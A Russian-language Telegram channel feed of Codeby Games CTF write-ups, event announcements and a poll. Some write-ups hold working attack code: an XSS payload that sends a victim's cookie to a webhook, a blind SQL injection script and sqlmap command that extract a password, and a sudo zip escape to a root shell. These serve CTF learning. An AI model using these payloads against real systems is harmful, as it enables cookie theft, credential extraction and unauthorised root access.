#WEB Клиент всегда прав
Reflected XSS
Ссылка на задание🚩
От: @exited3n, автор канала @pt_soft
#codebygames
Reflected XSS
Ссылка на задание
От: @exited3n, автор канала @pt_soft
import requests
import json
webhook_api_url = 'https://webhook.link/api/new'
json_hook = json.loads(requests.get(webhook_api_url).text)
webhook_url = json_hook['routes']['webhook']
webhook_inspect_url = json_hook['routes']['inspect'].get('html')
webhook_inspect_json = json_hook['routes']['inspect'].get('api')
webhook = requests.post(f'http://62.173.140.174:16013/?report=http://62.173.140.174:16013/?search=<script>document.location="{webhook_url}?"%2bdocument.cookie</script>')
webhook_data = requests.get(webhook_inspect_url)
webhook_json = json.loads(requests.get(webhook_inspect_json).text)
flag = json.dumps(webhook_json['callbacks'][0]['args']['flag'], indent=4)
print(f'Open URL in your browser: {webhook_inspect_url}')
print(flag)
#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5❤2
Forwarded from Северная Пальмира
Друзья, коллеги, подписчики.
Недавно наш канал перевалил за 1000 подписчиков и мы сказали: Дальше — больше.
Время пришло!
Мы открываем регистрацию участников на HACK OSINT CTF 2024.
Организаторы мероприятия:
- Northern Palmyra;
- NullByte | Open Security;
Призовой фонд мероприятия составляет 2600$, а также множество цифровых наград от различных телеграм-сервисов и ещё несколько приятных сюрпризов.
Зарегистрироваться можно на hackosint.net
Добавляйтесь в телеграм-группу мероприятия, чтобы быть на связи и не пропускать важных новостей.
Побороться за награды можно как в команде, так и в индивидуальном зачете !
Северная Пальмира & Intelligence guild
#Intelligence_event
Недавно наш канал перевалил за 1000 подписчиков и мы сказали: Дальше — больше.
Время пришло!
Мы открываем регистрацию участников на HACK OSINT CTF 2024.
Организаторы мероприятия:
- Northern Palmyra;
- NullByte | Open Security;
Призовой фонд мероприятия составляет 2600$, а также множество цифровых наград от различных телеграм-сервисов и ещё несколько приятных сюрпризов.
Зарегистрироваться можно на hackosint.net
Добавляйтесь в телеграм-группу мероприятия, чтобы быть на связи и не пропускать важных новостей.
Побороться за награды можно как в команде, так и в индивидуальном зачете !
Северная Пальмира & Intelligence guild
#Intelligence_event
❤4🤔1
Привет кибер-котлеты!
После пхд можно выдохнуть и возвращаться в нормальный режим работы. Кстати, как вам пхд? Пиши в комментах. Вот вам райтапчик по новой таске Codeby
#pwn Имя от @Delinester
Описание от автора и ссылка на таск:
https://skillful-warrior-e87.notion.site/Name-PWN-Writeup-by-Delinester-fd5a8b9206534f95b990b9d50ce51fb5
#codebygames
После пхд можно выдохнуть и возвращаться в нормальный режим работы. Кстати, как вам пхд? Пиши в комментах. Вот вам райтапчик по новой таске Codeby
#pwn Имя от @Delinester
Описание от автора и ссылка на таск:
https://skillful-warrior-e87.notion.site/Name-PWN-Writeup-by-Delinester-fd5a8b9206534f95b990b9d50ce51fb5
#codebygames
Amir's Notion on Notion
“Name” PWN Writeup by Delinester | Notion
https://codeby.games/categories/pwn/d452cdbb-c9cb-4aa1-9d25-3be6bf171223
👍4🔥2❤1
Forwarded from VKACTF [Новости]
This media is not supported in your browser
VIEW IN TELEGRAM
⚔️Прошел ровно год с предыдущих соревнований VKACTF, и мы вновь возвращаемся на поля киберсражений⚔️
🚩 Итак, всероссийские соревнования VKACTF 2024 стартуют 1 июня в 18:00 и продлятся 24 часа⏰
🏆Соревнования будут проводиться в двух зачетах: общем и специальном
🇷🇺В общем зачете могут участвовать студенты из России
🪖В специальном зачете - курсанты ВУЗов Силовых структур РФ
🏅Победители и призеры соревнований будут награждены ценными призами, о которых мы расскажем чуть позже!
👥Количество участников в команде - до 5 человек
✏️Регистрация на платформе открывается 25 мая
❕Канал с новостями: @vkactf
🗣Чат поддержки: @vkactf_chat
🚩 Итак, всероссийские соревнования VKACTF 2024 стартуют 1 июня в 18:00 и продлятся 24 часа⏰
🏆Соревнования будут проводиться в двух зачетах: общем и специальном
🇷🇺В общем зачете могут участвовать студенты из России
🪖В специальном зачете - курсанты ВУЗов Силовых структур РФ
🏅Победители и призеры соревнований будут награждены ценными призами, о которых мы расскажем чуть позже!
👥Количество участников в команде - до 5 человек
✏️Регистрация на платформе открывается 25 мая
❕Канал с новостями: @vkactf
🗣Чат поддержки: @vkactf_chat
❤4
#crypto
Нулевой шифр
От @Max_RSC (ТОП-10 на платформе Codeby Games)
Ссылка на задание
Для решения таска потребуется уверенный навык программирования на Python. Надеюсь, это понятно.
Сначала заглянем в request.txt. В GET-запросе видим параметр FLAG со значением в виде строки, обернутой в base64:
FLAG=lUmU56gHyTe0DabyGJIZEI9mGyx/4NG1tX8yhml1KmQWEdfQ3TNNkU3z1w==
Скопируем эту строку куда-нибудь — еще пригодится. Про файл request.txt можно забыть, больше он не понадобится.
Идем в sourceCode.txt.
Эта строка сообщает нам о том, что используется алгоритм шифрования RC4, он же ARC4, он же Rivest Cipher 4. По сегодняшним меркам этот алгоритм шифрования считается устаревшим и больше не является криптографически безопасным.
Эти строки сообщают нам о том, что ключ — это первые шесть символов флага. Другими словами, CODEBY.
Эта строка сообщает нам о том, что ключ хешируется, но для шифрования используются лишь первые 16 байт ключа. Мы получили всю необходимую информацию и теперь можем с легкостью расшифровать флаг. Кстати, не рекомендую делать это посредством онлайн-декодера — скорее всего, у вас ничего не получится, да и необходимости в этом нет. Все что нужно сделать — это лишь немного переписать код. Приступаем:
Третью, четвертую и пятую строки можно скопировать из функции без изменений.
Прилагаю скрипт целиком с моими комментариями:
Выполняем скрипт и получаем флаг.
Рекомендую не бездумно копировать скрипт, а подумать над прочитанным и написать скрипт самостоятельно. Помните, что цель решения таска — это не получить флаг и чуть-чуть подняться в рейтинге, а научиться чему-нибудь новому.
#codebygames
Нулевой шифр
От @Max_RSC (ТОП-10 на платформе Codeby Games)
Ссылка на задание
Для решения таска потребуется уверенный навык программирования на Python. Надеюсь, это понятно.
Сначала заглянем в request.txt. В GET-запросе видим параметр FLAG со значением в виде строки, обернутой в base64:
FLAG=lUmU56gHyTe0DabyGJIZEI9mGyx/4NG1tX8yhml1KmQWEdfQ3TNNkU3z1w==
Скопируем эту строку куда-нибудь — еще пригодится. Про файл request.txt можно забыть, больше он не понадобится.
Идем в sourceCode.txt.
cipher = Cipher(algorithms.ARC4(hashed_key), mode=None, backend=default_backend())
Эта строка сообщает нам о том, что используется алгоритм шифрования RC4, он же ARC4, он же Rivest Cipher 4. По сегодняшним меркам этот алгоритм шифрования считается устаревшим и больше не является криптографически безопасным.
FLAG = '******{***********************************}'.encode()
key = FLAG[:6]Эти строки сообщают нам о том, что ключ — это первые шесть символов флага. Другими словами, CODEBY.
hashed_key = hashlib.sha256(key).digest()[:16]
Эта строка сообщает нам о том, что ключ хешируется, но для шифрования используются лишь первые 16 байт ключа. Мы получили всю необходимую информацию и теперь можем с легкостью расшифровать флаг. Кстати, не рекомендую делать это посредством онлайн-декодера — скорее всего, у вас ничего не получится, да и необходимости в этом нет. Все что нужно сделать — это лишь немного переписать код. Приступаем:
key = b'CODEBY'
FLAG= base64.b64decode('lUmU56gHyTe0DabyGJIZEI9mGyx/4NG1tX8yhml1KmQWEdfQ3TNNkU3z1w==')
Третью, четвертую и пятую строки можно скопировать из функции без изменений.
Прилагаю скрипт целиком с моими комментариями:
# Подключаем нужные библиотеки (или устанавливаем, если их нет)
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
import base64
import hashlib
# Декодируем флаг из base64
FLAG= base64.b64decode('lUmU56gHyTe0DabyGJIZEI9mGyx/4NG1tX8yhml1KmQWEdfQ3TNNkU3z1w==')
# Обратите внимание, что ключ — это байтовая строка
key = b'CODEBY'
# Хешируем ключ, но используем лишь его первые 16 байт
hashed_key = hashlib.sha256(key).digest()[:16]
# Указываем, что хотим использовать алгоритм шифрования ARC4
cipher = Cipher(algorithms.ARC4(hashed_key), mode=None, backend=default_backend())
encryptor = cipher.encryptor()
# Передаем флаг на вход функции, которая производит расшифровку
ct = encryptor.update(FLAG) + encryptor.finalize()
# Печатаем флаг
print(ct)
Выполняем скрипт и получаем флаг.
Рекомендую не бездумно копировать скрипт, а подумать над прочитанным и написать скрипт самостоятельно. Помните, что цель решения таска — это не получить флаг и чуть-чуть подняться в рейтинге, а научиться чему-нибудь новому.
#codebygames
❤11🔥1
Forwarded from Purple Chronicles (Hunter Biden)
Разбор задания "Точка невозврата" с платформы Codeby Games🚩
https://telegra.ph/Codeby-Games-Point-of-no-return-writeup-09-10
Сегодня продолжим тему race condition, но научимся использовать другие средства для эксплуатации уязвимости. В этот раз для решения задания средней сложности напишем Python-скрипт👩💻 и познакомимся с расширением Turbo Intruder для Burp Suite😈
#пентест #web #race
https://telegra.ph/Codeby-Games-Point-of-no-return-writeup-09-10
Сегодня продолжим тему race condition, но научимся использовать другие средства для эксплуатации уязвимости. В этот раз для решения задания средней сложности напишем Python-скрипт
#пентест #web #race
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
Codeby Games "Point of no return" writeup
Всем привет! Сегодня мы, подобно Льюису Хэмильтону, станем профессиональными гонщиками, найдём и проэксплуатируем race condition двумя разными способами (Python и Turbo Intruder), решив задание средней сложности "Точка невозврата" с платформы Codeby Games.
🫡3❤1❤🔥1🔥1👏1
#WEB Минное поле
От @cherepawwka, автора канала Purple Chronicles
Ссылка на таск🚩
Райтап: https://telegra.ph/Codeby-Games-Minefield-writeup-09-05
#codebygames
От @cherepawwka, автора канала Purple Chronicles
Ссылка на таск
Райтап: https://telegra.ph/Codeby-Games-Minefield-writeup-09-05
#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
Codeby Games Minefield writeup
Всем привет! Сегодня мы решим задание средней сложности с платформы Codeby Games под названием "Минное поле". Здесь мы проэксплуатируем "слепую" SSTI и научимся пользоваться инструментом ngrok.
❤4
Ребятки, кибер-котлеты, всем привет!
У меня возник вопрос. Получается-ли (находите-ли вы время) решать задачки на платформе? Полезен ли канал?
У меня возник вопрос. Получается-ли (находите-ли вы время) решать задачки на платформе? Полезен ли канал?
Anonymous Poll
21%
Да, с помощью райтапов я решил более 5 задач
30%
Да, с помощью канала я начал понимать задачи и решил более чем 3 задачи
15%
Нет, мне просто интересно читать канал, я не решаю задачи на платформе
4%
Нет, я ничего не понимаю и мне нужна помощь сообщества
52%
Кто проживает на дне океана?
Занимаюсь благотворительностью! Задонатил в призовой фонд HackOsint, который пройдет 21.06.2024 немножко крипто-монет
Начинающим кибер-котлеткам я советую участвовать и прокачивать скиллы
Профессиональных кибер-котлет я прошу по возможности помогать малышам своими знаниями, а так же организаторам чеканной монетой
Лучшее, что мы можем делать это то, что мы сделали сами
Думаю райтапчики с hackosint будут появляться в моем канале. Так что никто не останется без райтапчиков
С оргами на связи📞
https://t.me/hackOSINTCTF
Начинающим кибер-котлеткам я советую участвовать и прокачивать скиллы
Профессиональных кибер-котлет я прошу по возможности помогать малышам своими знаниями, а так же организаторам чеканной монетой
Лучшее, что мы можем делать это то, что мы сделали сами
Думаю райтапчики с hackosint будут появляться в моем канале. Так что никто не останется без райтапчиков
С оргами на связи
https://t.me/hackOSINTCTF
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7👍1
#crypto
Веселый RSA
От @Max_RSC (ТОП-10 на платформе Codeby Games)
Ссылка на задание
Даны три шифртекста, которые представляют собой одно и то же сообщение. Подсказка намекает, что Боб плохо разбирается в RSA, поэтому при шифровании допустил серьезную ошибку. Действительно, мы видим, что вместо стандартной экспоненты e = 65537 он использовал значения 5, 7 и 13, a модули n1, n2 и n3 настолько малы, что с легкостью раскладываются на множители. Это можно назвать критической уязвимостью.
Если мы возьмем первое по счету сообщение и попробуем вычислить приватную экспоненту d, то поймем, что это невозможно:
На простом языке это означает, что в процессе шифрования пользователь допустил фатальную ошибку.
Возьмем второе по счету сообщение и попробуем найти приватную экспоненту d – то же самое:
Возьмем третье по счету сообщение. Похоже, что это сообщение было зашифровано правильно, а значит, можно вычислить d:
После нахождения d мы с легкостью расшифровываем шифртекст:
Мы получили трехзначное число, которое, разумеется, я вам не покажу, чтобы вы не жульничали, а решили таск самостоятельно и следовательно, научились чему-нибудь новому.
Считаем от этого числа хеш-сумму по алгоритму SHA256:
Получившуюся строку обoрачиваем в CODEBY и сдаем флаг.
#codebygames
Веселый RSA
От @Max_RSC (ТОП-10 на платформе Codeby Games)
Ссылка на задание
Даны три шифртекста, которые представляют собой одно и то же сообщение. Подсказка намекает, что Боб плохо разбирается в RSA, поэтому при шифровании допустил серьезную ошибку. Действительно, мы видим, что вместо стандартной экспоненты e = 65537 он использовал значения 5, 7 и 13, a модули n1, n2 и n3 настолько малы, что с легкостью раскладываются на множители. Это можно назвать критической уязвимостью.
Если мы возьмем первое по счету сообщение и попробуем вычислить приватную экспоненту d, то поймем, что это невозможно:
>>> d = pow(e, -1, phi)
Traceback (most recent call last): File "<stdin>", line 1, in <module> ValueError: base is not invertible for the given modulus
На простом языке это означает, что в процессе шифрования пользователь допустил фатальную ошибку.
Возьмем второе по счету сообщение и попробуем найти приватную экспоненту d – то же самое:
>>> d = pow(e, -1, phi)
Traceback (most recent call last): File "<stdin>", line 1, in <module> ValueError: base is not invertible for the given modulus
Возьмем третье по счету сообщение. Похоже, что это сообщение было зашифровано правильно, а значит, можно вычислить d:
>>> d = pow(e, -1, phi)
>>> d
# 288613
После нахождения d мы с легкостью расшифровываем шифртекст:
>>> message = pow(c, d, n)
Мы получили трехзначное число, которое, разумеется, я вам не покажу, чтобы вы не жульничали, а решили таск самостоятельно и следовательно, научились чему-нибудь новому.
Считаем от этого числа хеш-сумму по алгоритму SHA256:
>>> from hashlib import sha256
>>> result = sha256(str(message).encode()).hexdigest()
Получившуюся строку обoрачиваем в CODEBY и сдаем флаг.
#codebygames
❤9🔥2
Forwarded from Purple Chronicles (Hunter Biden)
Эксплуатация SSTI в приложениях на Flask+Jinja2🐍
https://telegra.ph/SSTI-exploitation-05-02
В этой статье мы поговорим о том, что такое SSTI, как найти эту уязвимость, верифицировать шаблонизатор и сконфигурировать полезную нагрузку для получения RCE!😤
Мы также познакомимся с инструментами, помогающими автоматизировать процесс эксплуатации, которые можно смело забирать в свой арсенал, а для закрепления полученных знаний решим таск с платформы CodeBy Games🚩
#пентест #web #ssti
https://telegra.ph/SSTI-exploitation-05-02
В этой статье мы поговорим о том, что такое SSTI, как найти эту уязвимость, верифицировать шаблонизатор и сконфигурировать полезную нагрузку для получения RCE!
Мы также познакомимся с инструментами, помогающими автоматизировать процесс эксплуатации, которые можно смело забирать в свой арсенал, а для закрепления полученных знаний решим таск с платформы CodeBy Games
#пентест #web #ssti
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
SSTI exploitation
Всем привет! Сегодня мы на простом примере довольно подробно разберём уязвимость SSTI и закрепим изученный материал, решив несложный таск на платформе CodeBy Games тремя способами.
⚡4🔥2👏1
#криптография
Искусство войны от @exited3n, автора канала @pt_soft
Сложность: легкий
Ссылка на задание
#codebygames
Искусство войны от @exited3n, автора канала @pt_soft
Сложность: легкий
Ссылка на задание
from Crypto.Util.number import long_to_bytes
def inv(a, m):
m0 = m
x0 = 0
x1 = 1
if m == 1:
return 0
while a > 1:
q = a // m
t = m
m = a % m
a = t
t = x0
x0 = x1 - q * x0
x1 = t
if x1 < 0:
x1 = x1 + m0
return x1
def findMinX(num, rem, k):
prod = 1
for i in range(0, k):
prod = prod * num[i]
result = 0
for i in range(0, k):
pp = prod // num[i]
result = result + rem[i] * inv(pp, num[i]) * pp
return result % prod
rem = [7, 4, 9]
num = [17, 23, 37]
k = len(num)
a = findMinX(num, rem, k)
cipher_text = 25183524468752482838730336135334402772668615375346038
flag = cipher_text ^ a
print("a ==", a)
print(long_to_bytes(flag).decode('UTF-8'))
#codebygames
🔥8❤1🤬1
Forwarded from wr3dmast3r vs pentest
Знакомимся с DOOM DOM Invader, или как найти DOM-XSS на Habr во время написания статьи 😔
Сегодня поговорим про инструмент DOM Invader, узнаем некоторые причины появления DOM-уязвимостей и проанализируем несколько примеров уязвимого JavaScript-кода🖼️
Также вы узнаете, какой потенциальный импакт можно показывать команде BugBounty для получения выплаты за Client-Side уязвимость👀
Подробнее
Сегодня поговорим про инструмент DOM Invader, узнаем некоторые причины появления DOM-уязвимостей и проанализируем несколько примеров уязвимого JavaScript-кода
Также вы узнаете, какой потенциальный импакт можно показывать команде BugBounty для получения выплаты за Client-Side уязвимость
Подробнее
Please open Telegram to view this post
VIEW IN TELEGRAM
Хабр
Осваиваем DOM Invader: ищем DOM XSS и Prototype Pollution на примере пяти лабораторных и одной уязвимости на Хабре
Привет, Хабр! Сегодня мы познакомимся с DOM XSS и Prototype Pollution, рассмотрим примеры уязвимостей на Bug Bounty и научимся использовать инструмент DOM Invader, который заметно упростит поиск таких...
❤🔥2❤1
Forwarded from KarKarichCTF
#квесты
Секретный кабинет от @karkarich_1, автора канала @KARkarich37
Сложность: легкий
Ссылка на задание
В задании дается хост и два порта: на одном из них веб сервис, а на другом ssh. Смотрим на сервис и видим форму для отправки пароля при этом форма отправляет еще и имя пользователя “josh”. Тогда запустим sqlmap и посмотрим, что он выводит. Sqlmap говорит, что password неуязвим, а вот username да!
Получается залогинится под Джоном, но на страничке все равно ничего нет( Тогда попробуем извлечь из БД его пароль, используя LIKE, чтобы залогиниться через ssh. Я это делал вот этим скриптом:
Видим, что можем выполнять команду zip от рута. Далее повышаем привилегии и все!
Секретный кабинет от @karkarich_1, автора канала @KARkarich37
Сложность: легкий
Ссылка на задание
В задании дается хост и два порта: на одном из них веб сервис, а на другом ssh. Смотрим на сервис и видим форму для отправки пароля при этом форма отправляет еще и имя пользователя “josh”. Тогда запустим sqlmap и посмотрим, что он выводит. Sqlmap говорит, что password неуязвим, а вот username да!
sqlmap -u "http://62.173.140.174:28780/login.php" --data "username=josh&password=asd" --method POST
Получается залогинится под Джоном, но на страничке все равно ничего нет( Тогда попробуем извлечь из БД его пароль, используя LIKE, чтобы залогиниться через ssh. Я это делал вот этим скриптом:
В итоге получаем хэш пароля и через crackstation.net подбираем сам пароль. Далее подключаемся по ssh и сразу прописываемimport requests as r
from string import printable
s = r.Session()
r0 = s.get("http://62.173.140.174:28780/login.php")
r1 = s.post("http://62.173.140.174:28780/login.php", data={"username":"josh", "password":"a"}).text
pas = ''
f = 1
while f:
f = 0
for i in printable:
if i in ["%", "_"]: continue
r2 = s.post("http://62.173.140.174:28780/login.php", data={"username":f"josh' AND password LIKE '{pas+i}%' #", "password":"a"}).text
if r2 != r1:
pas+=i
f = 1
break
print(pas)
sudo -l
Видим, что можем выполнять команду zip от рута. Далее повышаем привилегии и все!
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF
🔥6🤯2
Forwarded from infosec
• Очень объемное руководство, которое поможет вам разобраться в основах работы Wi-Fi:
#CheatSheet #WiFi
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8
Когда нашел всё:
Слитые пароли
Все никнеймы
Все айди
Админки
Почтовые клиенты
Мертвого слона
Обошёл все проверки на брут
Но не флаг.
Слитые пароли
Все никнеймы
Все айди
Админки
Почтовые клиенты
Мертвого слона
Обошёл все проверки на брут
Но не флаг.